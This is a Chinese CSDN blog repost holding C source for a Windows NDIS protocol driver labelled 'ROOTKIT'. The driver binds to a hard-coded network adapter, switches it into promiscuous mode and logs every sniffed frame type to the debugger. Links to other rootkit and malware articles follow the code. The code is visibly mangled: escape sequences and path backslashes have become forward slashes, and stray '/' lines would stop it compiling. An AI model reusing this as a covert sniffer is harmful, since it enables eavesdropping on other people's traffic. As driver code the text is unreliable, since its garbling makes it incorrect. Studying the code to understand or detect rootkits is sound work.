系统底层ROOKIT拦截网络数据

最新推荐文章于 2024-10-01 09:15:46 发布
最新推荐文章于 2024-10-01 09:15:46 发布
阅读量606 收藏
点赞数
文章标签: 网络 string structure wince binding network
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wind0513/article/details/5341006
版权

#include "ntddk.h"

// important!! place this before ndis.h
#define NDIS40 1

#include "ndis.h"
#include "stdio.h"

//
// prototypes for all our network callbacks
//
VOID OnOpenAdapterDone ( IN NDIS_HANDLE ProtocolBindingContext, IN NDIS_STATUS Status, IN NDIS_STATUS OpenErrorStatus );
VOID OnCloseAdapterDone ( IN NDIS_HANDLE ProtocolBindingContext, IN NDIS_STATUS Status );
VOID OnSendDone   ( IN NDIS_HANDLE ProtocolBindingContext, IN PNDIS_PACKET pPacket, IN NDIS_STATUS Status );
VOID OnTransferDataDone ( IN NDIS_HANDLE ProtocolBindingContext, IN PNDIS_PACKET Packet, IN NDIS_STATUS Status, IN UINT BytesTransferred );
VOID OnResetDone  ( IN NDIS_HANDLE ProtocolBindingContext, IN NDIS_STATUS Status );
VOID OnRequestDone  ( IN NDIS_HANDLE ProtocolBindingContext, IN PNDIS_REQUEST pRequest, IN NDIS_STATUS Status );
NDIS_STATUS OnReceiveStub      ( IN NDIS_HANDLE ProtocolBindingContext, IN NDIS_HANDLE MacReceiveContext, IN PVOID HeaderBuffer, IN UINT HeaderBufferSize, IN PVOID LookAheadBuffer, IN UINT LookaheadBufferSize, IN UINT PacketSize );
VOID OnReceiveDoneStub ( IN NDIS_HANDLE ProtocolBindingContext );
VOID OnStatus   ( IN NDIS_HANDLE ProtocolBindingContext, IN NDIS_STATUS Status, IN PVOID StatusBuffer, IN UINT StatusBufferSize );
VOID OnStatusDone  ( IN NDIS_HANDLE ProtocolBindingContext );
VOID OnBindAdapter  ( OUT PNDIS_STATUS theStatus, IN NDIS_HANDLE theBindContext, IN PNDIS_STRING theDeviceNameP, IN PVOID theSS1, IN PVOID theSS2 );
VOID OnUnbindAdapter ( OUT PNDIS_STATUS theStatus, IN NDIS_HANDLE theBindContext, IN PNDIS_HANDLE theUnbindContext );
VOID OnUnload   ( IN PDRIVER_OBJECT DriverObject );

NDIS_STATUS OnPNPEvent(   IN NDIS_HANDLE ProtocolBindingContext,
        IN PNET_PNP_EVENT pNetPnPEvent);

VOID OnProtocolUnload( VOID );
INT  OnReceivePacket( IN NDIS_HANDLE    ProtocolBindingContext,
       IN PNDIS_PACKET   Packet );

struct UserStruct
{
ULONG mData;
} gUserStruct;

// handle to the open network adapter
NDIS_HANDLE  gAdapterHandle;
NDIS_HANDLE  gNdisProtocolHandle;
NDIS_EVENT  gCloseWaitEvent;

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
UINT   aMediumIndex = 0;
NDIS_STATUS  aStatus, anErrorStatus;
NDIS_MEDIUM     aMediumArray=NdisMedium802_3;  // we only try 802.3
UNICODE_STRING anAdapterName;
NDIS_PROTOCOL_CHARACTERISTICS aProtocolChar;
NDIS_STRING aProtoName = NDIS_STRING_CONST("ROOTKIT_NET");
DbgPrint("ROOTKIT Loading...");

/
// Very Important !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
// Hard code this binding string to the adapter you wish to sniff
//
// obtain this from the registry:
// HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/NetworkCards
// -or-
// HKLM/SYSTEM/CurrentControlSet/Services/TcpIp/Linkage
//
//
/*
   On my system I have the following linkages:

   /Device/{6C0B978B-812D-4621-A30B-FD72F6C446AF} ORiNOCO Wireless LAN PC Card (5 volt)
   /Device/{E30AAA3E-044E-40D3-A8FE-64CC01F2B9B5}
   /Device/{5436B920-2709-4250-918D-B4ED3BB8CF9A} Dell TrueMobile 1150 Series Wireless LAN Mini PCI Card
   /Device/{5A6C6428-C5F2-4BA5-A469-49F607B369F2} 1394 Net Adapter
   /Device/{357AC276-D8E7-47BF-954D-F3123D3319BD} 3Com 3C920 Integrated Fast Ethernet Controller (3C905C-TX Compatible)
   /Device/{6D615BDB-A6C2-471D-992E-4C0B431334F1} 1394 Net Adapter
   /Device/{83EE41D0-5088-4CC7-BC99-CEA55D5662D2} 3Com 3C920 Integrated Fast Ethernet Controller (3C905C-TX Compatible)
   /Device/NdisWanIp
   /Device/{147E65D7-4065-4249-8679-F79DB39CFC27}
   /Device/{6AB35A1D-6D0B-45CA-9F1C-CD125F950D6F}
*/
//
// the format of the string is /Device/{GUID}
/
RtlInitUnicodeString( &anAdapterName, L"//Device//{A8500B8B-59F6-4215-90FA-80811CF765A4}" );
// init sync event for close
NdisInitializeEvent(&gCloseWaitEvent);

//__asm int 3

theDriverObject->DriverUnload  = OnUnload;


// init network sniffer - this is all standard and
// documented in the DDK.

RtlZeroMemory( &aProtocolChar,
   sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
aProtocolChar.MajorNdisVersion            = 4;
aProtocolChar.MinorNdisVersion            = 0;
aProtocolChar.Reserved                    = 0;
aProtocolChar.OpenAdapterCompleteHandler  = OnOpenAdapterDone;
aProtocolChar.CloseAdapterCompleteHandler = OnCloseAdapterDone;
aProtocolChar.SendCompleteHandler         = OnSendDone;
aProtocolChar.TransferDataCompleteHandler = OnTransferDataDone;

aProtocolChar.ResetCompleteHandler        = OnResetDone;
aProtocolChar.RequestCompleteHandler      = OnRequestDone;
aProtocolChar.ReceiveHandler              = OnReceiveStub;
aProtocolChar.ReceiveCompleteHandler      = OnReceiveDoneStub;
aProtocolChar.StatusHandler               = OnStatus;
aProtocolChar.StatusCompleteHandler       = OnStatusDone;
aProtocolChar.Name                        = aProtoName;
aProtocolChar.BindAdapterHandler    = OnBindAdapter;
aProtocolChar.UnbindAdapterHandler       = OnUnbindAdapter;
    aProtocolChar.UnloadHandler      = OnProtocolUnload;

aProtocolChar.ReceivePacketHandler       = OnReceivePacket;
aProtocolChar.PnPEventHandler     = OnPNPEvent;

DbgPrint("ROOTKIT: Registering NDIS Protocol/n");

// we have to register a protocol before we can bind to the
// MAC
NdisRegisterProtocol( &aStatus,
             &gNdisProtocolHandle,
             &aProtocolChar,
             sizeof(NDIS_PROTOCOL_CHARACTERISTICS));

if (aStatus != NDIS_STATUS_SUCCESS)
{
  char _t[255];
  _snprintf(_t, 253, "DriverEntry: ERROR NdisRegisterProtocol failed with error 0x%08X", aStatus);
  DbgPrint(_t);
  return aStatus;
}

// NdisOpenAdapter opens a connection between the protocol
// and the physical adapter (MAC layer)
NdisOpenAdapter(
  &aStatus,         // return code
  &anErrorStatus,        // return code
  &gAdapterHandle,       // returns a handle to the binding
  &aMediumIndex,        // ptr to int which is an
             // index into a 'medium' array - indicates what
             // the MAC should be 'viewed' as
  &aMediumArray,        // array of 'medium' types
  1,           // number of elements in the 'medium' array
  gNdisProtocolHandle,      // the handle returned from NdisRegisterProtocol
  &gUserStruct,        // ptr to a user controlled structure, this is up to the programmer
  &anAdapterName,        // name of the adapter to be opened
  0,           // bit mask of options
  NULL);          // ptr to additional info to pass to MacOpenAdapter

if (aStatus != NDIS_STATUS_PENDING)
{
  if(FALSE == NT_SUCCESS(aStatus))
  {
   /
   // something bad happened, close everything down
   /
   char _t[255];
   _snprintf(_t, 253, "ROOTKIT: NdisOpenAdapter returned an error 0x%08X", aStatus);
   DbgPrint(_t);
   // helpful hint
   if(NDIS_STATUS_ADAPTER_NOT_FOUND == aStatus)
   {
    DbgPrint("NDIS_STATUS_ADAPTER_NOT_FOUND");
   }

   // Remove the protocol or suffer a BSOD!
   NdisDeregisterProtocol( &aStatus, gNdisProtocolHandle);
   if(FALSE == NT_SUCCESS(aStatus))
   {
    DbgPrint("DeregisterProtocol failed!");
   }
   // use for winCE -- NdisFreeEvent(gCloseWaitEvent);

   return STATUS_UNSUCCESSFUL;
  }
  else
  {
   OnOpenAdapterDone(
    &gUserStruct,
    aStatus,
    NDIS_STATUS_SUCCESS
    );
  }
}
return STATUS_SUCCESS;
}

VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
NDIS_STATUS        Status;

DbgPrint("ROOTKIT: OnUnload called/n");

NdisResetEvent(&gCloseWaitEvent);

NdisCloseAdapter(
  &Status,
  gAdapterHandle);

// we must wait for this to complete
// ---------------------------------
if(Status == NDIS_STATUS_PENDING)
{
  DbgPrint("rootkit: OnUnload: pending wait event/n");
  NdisWaitEvent(&gCloseWaitEvent, 0);
}

NdisDeregisterProtocol( &Status, gNdisProtocolHandle);
if(FALSE == NT_SUCCESS(Status))
{
  DbgPrint("DeregisterProtocol failed!");
}

// use for winCE -- NdisFreeEvent(gCloseWaitEvent);

DbgPrint("rootkit: OnUnload: NdisCloseAdapter() done/n");
}

VOID
OnOpenAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
       IN NDIS_STATUS Status,
       IN NDIS_STATUS OpenErrorStatus )
{
NDIS_REQUEST      anNdisRequest;
NDIS_STATUS       anotherStatus;
ULONG     aMode = NDIS_PACKET_TYPE_PROMISCUOUS;

DbgPrint("ROOTKIT: OnOpenAdapterDone called/n");

if(NT_SUCCESS(OpenErrorStatus))
{
  // put the card into promiscuous mode
  anNdisRequest.RequestType = NdisRequestSetInformation;
  anNdisRequest.DATA.SET_INFORMATION.Oid = OID_GEN_CURRENT_PACKET_FILTER;
  anNdisRequest.DATA.SET_INFORMATION.InformationBuffer = &aMode;
  anNdisRequest.DATA.SET_INFORMATION.InformationBufferLength = sizeof(ULONG);

  NdisRequest( &anotherStatus,
      gAdapterHandle,
      &anNdisRequest
      );    
}
else
{
  char _t[255];
  _snprintf(_t, 252, "OnOpenAdapterDone called with error code 0x%08X", OpenErrorStatus);
  DbgPrint(_t);
}
}

VOID
OnCloseAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
        IN NDIS_STATUS Status )
{
DbgPrint("ROOTKIT: OnCloseAdapterDone called/n");

// sync with unload event
NdisSetEvent(&gCloseWaitEvent);
}

VOID
OnSendDone( IN NDIS_HANDLE ProtocolBindingContext,
      IN PNDIS_PACKET pPacket,
   IN NDIS_STATUS Status )
{

DbgPrint("ROOTKIT: OnSendDone called/n");
}

VOID
OnTransferDataDone ( IN NDIS_HANDLE thePBindingContext,
      IN PNDIS_PACKET thePacketP,
      IN NDIS_STATUS theStatus,
      IN UINT theBytesTransfered )
{
DbgPrint("ROOTKIT: OnTransferDataDone called/n");
}

/* a packet has arrived */
NDIS_STATUS
OnReceiveStub( IN NDIS_HANDLE ProtocolBindingContext, /* our open structure */
      IN NDIS_HANDLE MacReceiveContext,
      IN PVOID HeaderBuffer, /* ethernet header */
      IN UINT HeaderBufferSize,
      IN PVOID LookAheadBuffer, /* it is possible to have entire packet in here */
      IN UINT LookaheadBufferSize,
      UINT PacketSize )
{
char _t[255];
UINT aFrameType = 0;
// report the frame type to the debugger
memcpy(&aFrameType, ( ((char *)HeaderBuffer) + 12), 2);
_snprintf(_t, 253, "sniffed frame type %u, packetsize %u", aFrameType, PacketSize);
DbgPrint(_t);

// ignore everything
return NDIS_STATUS_NOT_ACCEPTED;
}

VOID
OnReceiveDoneStub( IN NDIS_HANDLE ProtocolBindingContext )
{
DbgPrint("ROOTKIT: OnReceiveDoneStub called/n");
    return;
}

VOID
OnStatus( IN NDIS_HANDLE ProtocolBindingContext,
    IN NDIS_STATUS Status,
    IN PVOID StatusBuffer,
    IN UINT StatusBufferSize )
{
    DbgPrint("ROOTKIT: OnStatus called/n");
return;
}

VOID
OnStatusDone( IN NDIS_HANDLE ProtocolBindingContext )
{
DbgPrint("ROOTKIT:OnStatusDone called/n");
    return;
}

VOID OnResetDone( IN NDIS_HANDLE ProtocolBindingContext,
      IN NDIS_STATUS Status )
{  
DbgPrint("ROOTKIT: OnResetDone called/n");
    return;
}

VOID
OnRequestDone( IN NDIS_HANDLE ProtocolBindingContext,
      IN PNDIS_REQUEST NdisRequest,
      IN NDIS_STATUS Status )
{
DbgPrint("ROOTKIT: OnRequestDone called/n");
    return;
}

VOID OnBindAdapter(  OUT PNDIS_STATUS theStatus,
      IN NDIS_HANDLE theBindContext,
      IN PNDIS_STRING theDeviceNameP,
      IN PVOID theSS1,
      IN PVOID theSS2 )
{
DbgPrint("ROOTKIT: OnBindAdapter called/n");
    return;
}

VOID OnUnbindAdapter( OUT PNDIS_STATUS theStatus,
      IN NDIS_HANDLE theBindContext,
      IN PNDIS_HANDLE theUnbindContext )
{
DbgPrint("ROOTKIT: OnUnbindAdapter called/n");
    return;
}

NDIS_STATUS OnPNPEvent(   IN NDIS_HANDLE ProtocolBindingContext,
        IN PNET_PNP_EVENT pNetPnPEvent)
{
DbgPrint("ROOTKIT: PtPnPHandler called");
return NDIS_STATUS_SUCCESS;
}

VOID OnProtocolUnload( VOID )
{
DbgPrint("ROOTKIT: OnProtocolUnload called");
return;
}

INT  OnReceivePacket( IN NDIS_HANDLE    ProtocolBindingContext,
       IN PNDIS_PACKET   Packet )
{
DbgPrint("ROOTKIT: OnReceivePacket called/n");
return 0;
}

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/yincheng01/archive/2009/06/26/4300189.aspx

wind0513
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
Rookit攻防机制与实现方法
11-06
DKOM则是指Rootkit直接操作内核对象,绕过用户模式的安全机制,实现对系统底层的控制。虚拟化技术则让Rootkit创建一个假象的操作系统层,使得安全软件无法正确识别真实的状态。 面对Rootkit的威胁,防御策略主要...
basic driver to send/recv raw packets on the network
errorlife的专栏
08-09 1718
//////////////////////////////////////////////////////////////////////////////////////// BHWIN_NET2, hoglund Jan 2004// basic driver to send/recv raw packets on the network// /////////////////////////
【Robot】Rookit简介
shengda_mao1118的博客
10-24 1218
转发:https://blog.csdn.net/tiandyoin/article/details/75136484 Rootkit自身也是木马后门或恶意程序的一类,只是,它很特殊,为什么呢?因为,你无法找到它。 正如自然界的规则一样,最流行的病毒,对生物的伤害却是最小的,例如一般的感冒,但是最不流行的病毒,却是最夺命的。Rootkit木马就是信息世界里的 AIDS,一旦感染,就...
关于隐藏进程ROOKIT木马的介绍
Shannonhe的专栏
11-11 1036
这样的事情并不一定会发生在所有个人计算机用户的身上,因为它们并非主流的群体,然而一旦不幸发生,却会给你带来远比以前遭受的一切病毒袭击更恐惧的感受,你会惊恐的发现系统有点异常行为、敏感数据遭遇盗窃、甚至有明显的木马感染的表现,但是杀毒软件报告你的系统完好,你用流行的进程查看工具也没有发现可疑程序,但是你的机器却一直表现异常……    正如自然界的规则一样,最流行的病毒,对生物的伤害却是最小的,
rootkit技术
sdulibh的专栏
02-25 6362
熬夜写llroot,写的头有些晕了,代码也有点乱,所以停下来歇歇;就又去逆向昨天下的那个rootkit,搞了1个多小时,头又晕了,才搞了不到一半,夜深人静的时候,孤孤单单,没有美女陪,不爽啊.想想好长时间没有在这个blog上写技术文章了,于是就转来下面一篇文章,文章比较老了,针对linux2.2内核的,但是基本的思路是没有失效的.正好这学期的操作系统课程考试也打算让研究生写一些类似的程序,所以贴在
恶意软件分析笔记V0.1(持续更新)
欢迎!欢迎来到17号城市!
08-27 2427
文章目录恶意软件分析恶意软件能做什么恶意代码类型1. 基础静态分析反病毒引擎扫描【工具】恶意代码的指纹`查找字符串【工具】`加壳PEiD【工具】PE文件格式文件头 PE header`DLL文件结构`DLL表分节(Section)`.text(代码段)`.rdata(数据段)`.data(数据段)`.idata(数据段).edata(数据段).rsrc.reloc未整理PE View【工具】PE Studio【工具】PE Viewer【工具】Resource Hacker【工具】链接库与函数`DLL文件`静
rootkit概述
小冰球
12-07 9973
这个是摘自微信公众号里面的文章; rootkit是一个复合词,由root和kit两个词组成。root是用来描述具有计算机最高权限的用户。另一方面,kit被Merrian-Webster定义为工具和实现的集合。因此,rootkit是一组能获得计算机系统root或者管理员权限对计算机进行访问的工具。但在恶意软件领域,我们将rootkit定义为一组在恶意软件中获得root访问权限、完全控...
「 CISSP学习笔记 」08.安全运营
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
02-03 3271
该知识领域涉及如下考点,具体内容分布于如下各个子章节: - 理解并遵守调查 - 执行记录和监控活动 - 执行配置管理 (CM)(例如,预配、基线、自动化) - 应用基本的安全操作概念 - 应用资源保护 - 执行事故管理 - 执行和维护检测和预防措施 - 实施和支持补丁和漏洞管理 - 理解并参与变更管理过程 - 执行恢复策略 - 执行灾难恢复 (DR) 过程 - 测试灾难恢复计划 (DRP) - 参与业务连续性 (BC) 计划的制定和演练 - 执行并管理物理安全 - 解决人员安全问题
ROOKIT后门工具
06-21
网络安全领域,"ROOKIT后门工具"是一种特殊类型的技术工具,它主要用于检测和识别系统中的隐藏后门。后门,顾名思义,是恶意攻击者在计算机系统网络设备中留下的秘密通道,使他们能够在未经授权的情况下访问或...
OpenArk:OpenArk是Windows的开源反rookit(ARK)工具-Open source
03-25
OpenArk是Windows的一个开源反rookit(ARK)工具。 Ark是Anti-Rootkit的缩写,它旨在反转/编程帮助程序,用户也可以在OS中找出隐藏的恶意软件。 将来将支持越来越强大的功能。 特征 进程-进程/线程/模块/句柄/内存/...
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 919
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
Linux下send函数和recv函数
最新发布
威桑的博客
10-01 279
Linux下send和recv
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 830
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
RootKit技术揭秘:从objecthook看信息隐藏与反调试策略
"RooKit底层技术研究,系统攻防,底层攻防,病毒隐藏" 在深入探讨RooKit底层技术之前,首先需要理解RooKit的概念。RooKit是一种恶意软件技术,它允许攻击者在操作系统级别隐藏自己的存在,通常用于逃避检测和持续控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值